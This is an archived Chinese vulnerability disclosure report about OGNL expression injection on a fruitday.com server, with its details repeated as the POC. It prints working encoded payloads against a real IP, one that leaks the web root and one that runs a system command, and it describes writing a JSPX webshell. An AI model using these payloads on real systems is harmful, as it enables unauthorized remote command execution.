破壳企业应急安全(防御方向)课程 应急响应 勒索病毒 挖矿木马 DDOS 日志分析

天天果园某平台表达式注入(已Getshell)

编号219335
Urlhttp://www.wooyun.org/bug.php?action=view&id=219335
漏洞状态漏洞已经通知厂商但是厂商忽略漏洞
漏洞标题天天果园某平台表达式注入(已Getshell)
漏洞类型命令执行
厂商fruitday.com
白帽子A1opex
提交日期2016-06-15 06:49:00
公开日期2016-06-20 07:40:00
修复时间(not set)
确认时间0000-00-00 00:00:00
Confirm Spend-1
漏洞标签表达式注入
关注数0
收藏数0
白帽评级
白帽自评rank20
厂商评级
厂商评rank0
漏洞简介
"Some of us don't get to grow old with the one we love."
 — "I'll go old with her, Mr. Reese, just from afar." 
某天,阳光明媚,乌云密布,睡了个午觉,梦见某ip存在表达式注入,醒来打开电脑,凭借零散的记忆,然后就Getshell了
漏洞细节

http://180.167.72.216:89

fruitday6.png


发现了一个表达式注入

fruitday5.png


payload

%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D


爆出绝对路径
尝试写shell
然而failed,访问其他页面都需要登录
想啊想,不能就这样放弃了呀
nmap扫一下,发现88端口还有一个web服务

fruitday2.png


巧的是
如果关闭了弹窗的话会被重定向到一个帮助文件,这个是不需要登录的
于是在89端口的表达式注入那里

%24%7B%23a%3D(new%20java.lang.ProcessBuilder(new%20java.lang.String%5B%5D%7B'cmd','/c','dir e:\*.jsp /s'%7D)).start()%2C%23b%3D%23a.getInputStream()%2C%23c%3Dnew%20java.io.InputStreamReader(%23b)%2C%23d%3Dnew%20java.io.BufferedReader(%23c)%2C%23e%3Dnew%20char%5B50000%5D%2C%23d.read(%23e)%2C%23matt%3D%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse')%2C%23matt.getWriter().println('~'%2B'~~2')%2C%23matt.getWriter().println(%23e)%2C%23matt.getWriter().println('2~'%2B'~~')%2C%23matt.getWriter().flush()%2C%23matt.getWriter().close()%7D


找到了88端口的这个web服务的物理路径
写shell
直接jsp肯定是不行的,然而jspx

fruitday4.png


fruitday1.png


总的来说就是从A服务的命令执行写shell到B服务进行访问的故事

POC

http://180.167.72.216:89

fruitday6.png


发现了一个表达式注入

fruitday5.png


payload

%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D


爆出绝对路径
尝试写shell
然而failed,访问其他页面都需要登录
想啊想,不能就这样放弃了呀
nmap扫一下,发现88端口还有一个web服务

fruitday2.png


巧的是
如果关闭了弹窗的话会被重定向到一个帮助文件,这个是不需要登录的
于是在89端口的表达式注入那里

%24%7B%23a%3D(new%20java.lang.ProcessBuilder(new%20java.lang.String%5B%5D%7B'cmd','/c','dir e:\*.jsp /s'%7D)).start()%2C%23b%3D%23a.getInputStream()%2C%23c%3Dnew%20java.io.InputStreamReader(%23b)%2C%23d%3Dnew%20java.io.BufferedReader(%23c)%2C%23e%3Dnew%20char%5B50000%5D%2C%23d.read(%23e)%2C%23matt%3D%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse')%2C%23matt.getWriter().println('~'%2B'~~2')%2C%23matt.getWriter().println(%23e)%2C%23matt.getWriter().println('2~'%2B'~~')%2C%23matt.getWriter().flush()%2C%23matt.getWriter().close()%7D


找到了88端口的这个web服务的物理路径
写shell
直接jsp肯定是不行的,然而jspx

fruitday4.png


fruitday1.png


总的来说就是从A服务的命令执行写shell到B服务进行访问的故事

修复方案

你懂的比我多呐>3<

状态信息 2016-06-15: 细节已通知厂商并且等待厂商处理中
2016-06-15: 厂商已查看当前漏洞内容,细节仅向厂商公开
2016-06-20: 厂商已经主动忽略漏洞,细节向公众公开
厂商回复None漏洞Rank:15 (WooYun评价)
回应信息危害等级:无影响厂商忽略忽略时间:2016-06-20 07:40
Showing 1-7 of 7 items.
评论内容评论人点赞数评论时间

@荒废的腰子 TuT中场休息

A1opex02016-06-16 10:49:00

"Some of us don't get to grow old with the one we love."— "I'll go old with her, Mr. Reese, just from afar." 某天,阳光明媚,乌云密布,睡了个午觉,梦见某ip存在表达式注入,醒来打开电脑,凭借零散的记忆,然后就Getshell了

CodeMan02016-06-15 14:31:00

@荒废的腰子 .....

重瞳02016-06-15 12:49:00

警察叔叔,就是这个人!

李旭敏02016-06-15 10:38:00

老板喊你去审核插件...

荒废的腰子02016-06-15 10:34:00

文艺女黑客

Ano_Tom02016-06-15 09:49:00

诗情画意

boooooom02016-06-15 09:47:00